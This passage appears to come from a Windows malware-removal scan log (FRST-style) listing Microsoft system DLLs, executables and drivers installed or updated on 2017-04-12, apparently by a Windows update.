2017-04-12 11:18 - 2017-03-28 07:58 - 01277856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 01202936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2017-04-12 11:18 - 2017-03-28 07:58 - 00961192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-04-12 11:18 - 2017-03-28 07:48 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-04-12 11:18 - 2017-03-28 07:37 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Diagnostics.dll
2017-04-12 11:18 - 2017-03-28 07:35 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-04-12 11:18 - 2017-03-28 07:33 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00426496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Wallet.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2017-04-12 11:18 - 2017-03-28 07:32 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-04-12 11:18 - 2017-03-28 07:26 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll
2017-04-12 11:18 - 2017-03-28 07:25 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2017-04-12 11:18 - 2017-03-28 07:24 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-04-12 11:18 - 2017-03-28 07:24 - 04614656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-04-12 11:18 - 2017-03-28 07:24 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-04-12 11:18 - 2017-03-28 07:23 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-04-12 11:18 - 2017-03-28 07:23 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-04-12 11:18 - 2017-03-28 07:18 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-04-12 11:18 - 2017-03-28 07:17 - 06109696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-04-12 11:18 - 2017-03-28 07:16 - 03198464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2017-04-12 11:18 - 2017-03-28 07:14 - 07468544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-04-12 11:18 - 2017-03-28 07:14 - 00103936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Devices.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2017-04-12 11:18 - 2017-03-28 07:13 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 00862208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-04-12 11:18 - 2017-03-28 07:12 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-04-12 11:18 - 2017-03-28 07:11 - 01600000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-04-12 11:18 - 2017-03-28 07:09 - 03106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2017-04-12 11:18 - 2017-03-28 07:08 - 01564160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-04-12 11:17 - 2017-03-28 07:10 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-04-12 11:16 - 2017-03-28 07:36 - 00237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Diagnostics.dll
2017-04-12 11:16 - 2017-03-28 07:36 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinRtTracing.dll
2017-04-12 11:16 - 2017-03-28 07:33 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Core.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00551936 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-04-12 11:16 - 2017-03-28 07:28 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-04-12 11:16 - 2017-03-28 07:27 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2017-04-12 11:16 - 2017-03-28 07:27 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\WwaApi.dll
2017-04-12 11:16 - 2017-03-28 07:26 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2017-04-12 11:16 - 2017-03-28 07:13 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-04-12 11:15 - 2017-03-28 07:30 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2017-04-12 11:15 - 2017-03-28 07:25 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2017-04-12 11:15 - 2017-03-28 07:14 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2017-04-12 11:15 - 2017-03-28 07:14 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2017-04-12 11:15 - 2017-03-28 07:13 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2017-04-12 11:15 - 2017-03-28 07:10 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2017-04-12 11:15 - 2017-03-28 07:10 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-04-12 11:15 - 2017-03-28 07:10 - 01266176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2017-04-12 11:15 - 2017-03-28 07:09 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2017-04-12 11:14 - 2017-03-28 08:26 - 00218520 _____ (Microsoft Corporation) C:\WINDOWS\system32\LsaIso.exe
2017-04-12 11:14 - 2017-03-28 08:09 - 00097128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Credentials.UI.CredentialPicker.dll
2017-04-12 11:14 - 2017-03-28 08:05 - 01072248 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2017-04-12 11:14 - 2017-03-28 07:38 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-04-12 11:14 - 2017-03-28 07:37 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-04-12 11:14 - 2017-03-28 07:35 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-04-12 11:14 - 2017-03-28 07:35 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-04-12 11:14 - 2017-03-28 07:34 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2017-04-12 11:14 - 2017-03-28 07:31 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-04-12 11:14 - 2017-03-28 07:29 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-04-12 11:14 - 2017-03-28 07:26 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-04-12 11:14 - 2017-03-28 07:21 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2017-04-12 11:14 - 2017-03-28 07:18 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2017-04-12 11:14 - 2017-03-28 07:18 - 00100864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2017-04-12 11:14 - 2017-03-28 07:15 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-04-12 11:14 - 2017-03-28 07:13 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2017-04-12 11:13 - 2017-03-28 08:32 - 00198856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2017-04-12 11:13 - 2017-03-28 08:29 - 02213248 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-04-12 11:13 - 2017-03-28 08:28 - 00773720 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-04-12 11:13 - 2017-03-28 08:20 - 01181024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-04-12 11:13 - 2017-03-28 08:18 - 01705976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-04-12 11:13 - 2017-03-28 08:10 - 01293152 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-04-12 11:13 - 2017-03-28 08:06 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 22221368 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01988048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01848584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2017-04-12 11:13 - 2017-03-28 08:05 - 01302136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2017-04-12 11:13 - 2017-03-28 07:59 - 02533728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-04-12 11:13 - 2017-03-28 07:41 - 00372736 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-04-12 11:13 - 2017-03-28 07:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\RdpRelayTransport.dll
2017-04-12 11:13 - 2017-03-28 07:34 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00418304 _____ C:\WINDOWS\system32\Windows.Perception.Stub.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
2017-04-12 11:13 - 2017-03-28 07:31 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2017-04-12 11:13 - 2017-03-28 07:29 - 00293888 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-04-12 11:13 - 2017-03-28 07:29 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2017-04-12 11:13 - 2017-03-28 07:28 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2017-04-12 11:13 - 2017-03-28 07:28 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-04-12 11:13 - 2017-03-28 07:27 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2017-04-12 11:13 - 2017-03-28 07:26 - 00549376 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-04-12 11:13 - 2017-03-28 07:24 - 01220096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2017-04-12 11:13 - 2017-03-28 07:22 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.DeviceEncryptionHandlers.dll
2017-04-12 11:13 - 2017-03-28 07:21 - 03778048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-04-12 11:13 - 2017-03-28 07:19 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-04-12 11:13 - 2017-03-28 07:18 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-04-12 11:13 - 2017-03-28 07:16 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2017-04-12 11:13 - 2017-03-28 07:15 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-04-12 11:13 - 2017-03-28 07:14 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
2017-04-12 11:13 - 2017-03-28 07:12 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2017-04-12 11:13 - 2017-03-28 07:11 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2017-04-12 11:13 - 2017-03-28 07:09 - 01131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-04-12 11:13 - 2017-03-28 07:06 - 00999424 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-04-12 11:12 - 2017-03-28 08:12 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-04-12 11:12 - 2017-03-28 08:11 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-04-12 11:12 - 2017-03-28 08:11 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-04-12 11:12 - 2017-03-28 08:10 - 07220184 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-04-12 11:12 - 2017-03-28 08:05 - 08168512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-04-12 11:12 - 2017-03-28 08:05 - 04260576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-04-12 11:12 - 2017-03-28 07:58 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-04-12 11:12 - 2017-03-28 07:38 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-04-12 11:12 - 2017-03-28 07:31 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2017-04-12 11:12 - 2017-03-28 07:30 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-04-12 11:12 - 2017-03-28 07:30 - 00692224 _____ (Microsoft Corporation) C:\WINDOWS\system32\CellularAPI.dll
2017-04-12 11:12 - 2017-03-28 07:29 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2017-04-12 11:12 - 2017-03-28 07:29 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-04-12 11:12 - 2017-03-28 07:28 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-04-12 11:12 - 2017-03-28 07:28 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-04-12 11:12 - 2017-03-28 07:27 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2017-04-12 11:12 - 2017-03-28 07:26 - 01145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2017-04-12 11:12 - 2017-03-28 07:24 - 06288384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-04-12 11:12 - 2017-03-28 07:21 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2017-04-12 11:12 - 2017-03-28 07:19 - 07655424 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-04-12 11:12 - 2017-03-28 07:17 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-04-12 11:12 - 2017-03-28 07:15 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2017-04-12 11:12 - 2017-03-28 07:11 - 01981440 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-04-12 11:12 - 2017-03-28 07:10 - 08076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-04-12 11:12 - 2017-03-28 07:09 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2017-04-12 11:11 - 2017-03-28 08:28 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-04-12 11:11 - 2017-03-28 08:26 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-04-12 11:11 - 2017-03-28 08:11 - 02187616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-04-12 11:11 - 2017-03-28 08:11 - 01738560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-04-12 11:11 - 2017-03-28 08:11 - 00402784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-04-12 11:11 - 2017-03-28 08:10 - 02758648 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-04-12 11:11 - 2017-03-28 08:10 - 01157008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 01276760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 00160088 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-04-12 11:11 - 2017-03-28 07:37 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2017-04-12 11:11 - 2017-03-28 07:36 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-04-12 11:11 - 2017-03-28 07:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2017-04-12 11:11 - 2017-03-28 07:35 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2017-04-12 11:11 - 2017-03-28 07:33 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-04-12 11:11 - 2017-03-28 07:33 - 00182272 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceDirectoryClient.dll
2017-04-12 11:11 - 2017-03-28 07:32 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-04-12 11:11 - 2017-03-28 07:32 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00276992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-04-12 11:11 - 2017-03-28 07:31 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Lights.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00311296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2017-04-12 11:11 - 2017-03-28 07:28 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2017-04-12 11:11 - 2017-03-28 07:28 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-04-12 11:11 - 2017-03-28 07:27 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2017-04-12 11:11 - 2017-03-28 07:27 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-04-12 11:11 - 2017-03-28 07:26 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2017-04-12 11:11 - 2017-03-28 07:25 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-04-12 11:11 - 2017-03-28 07:23 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-04-12 11:11 - 2017-03-28 07:23 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-04-12 11:11 - 2017-03-28 07:21 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2017-04-12 11:11 - 2017-03-28 07:20 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2017-04-12 11:11 - 2017-03-28 07:20 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-04-12 11:11 - 2017-03-28 07:19 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-04-12 11:11 - 2017-03-28 07:19 - 00235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00975872 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-04-12 11:11 - 2017-03-28 07:14 - 00913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-04-12 11:11 - 2017-03-28 07:13 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-04-12 11:11 - 2017-03-28 07:12 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2017-04-12 11:11 - 2017-03-28 07:12 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-04-12 11:11 - 2017-03-28 07:12 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-04-12 11:11 - 2017-03-28 07:11 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2017-04-12 11:11 - 2017-03-28 07:09 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-04-12 11:11 - 2017-03-28 07:09 - 01328640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2017-04-12 11:11 - 2017-03-28 07:08 - 02895872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2017-04-12 11:11 - 2017-03-28 07:06 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2017-04-12 11:11 - 2017-03-28 07:05 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-04-12 11:10 - 2017-03-28 07:37 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-04-12 11:10 - 2017-03-28 07:27 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-04-12 11:10 - 2017-03-28 07:25 - 18364928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
